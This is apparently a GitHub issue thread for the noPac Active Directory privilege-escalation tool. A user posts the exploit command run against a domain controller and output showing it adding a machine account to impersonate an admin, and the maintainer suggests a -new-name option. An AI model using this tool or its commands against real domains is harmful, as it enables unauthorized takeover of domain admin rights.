### ISSUE TITLE
SAMR SessionError: code: 0xc0000062 - STATUS_INVALID_ACCOUNT_NAME - The name provided is not a properly formed account name.

### ISSUE THREAD

**Issue by sm00v** [Ridter/noPac#7]
Running noPac against 2016 DC and receiving the following error. Tried hard-coding the machine account name and password with no success.

`└─# python3 /opt/noPac/noPac.py domain/user:'password' -dc-ip 192.168.1.12 

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
                                           
                                        
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] We have more than one target, Pls choices the hostname of the -dc-ip you input.
[*] 0: dc1
[*] 1: dc2
>>> Your choice: 0
[*] Selected Target dc1.domain.local
[*] Total Domain Admins 7
[*] will try to impersonat admin
[*] Adding Computer Account "WIN-AJKEBM3GBHT"
[*] MachineAccount "WIN-AJKEBM3GBHT" password = j2ZLU0Y@7uOL
[-] SAMR SessionError: code: 0xc0000062 - STATUS_INVALID_ACCOUNT_NAME - The name provided is not a properly formed account name.`

**Comment by Ridter** [comment]
There may be a problem with the computer name, you can try adding -new-name to customize a new computer name.
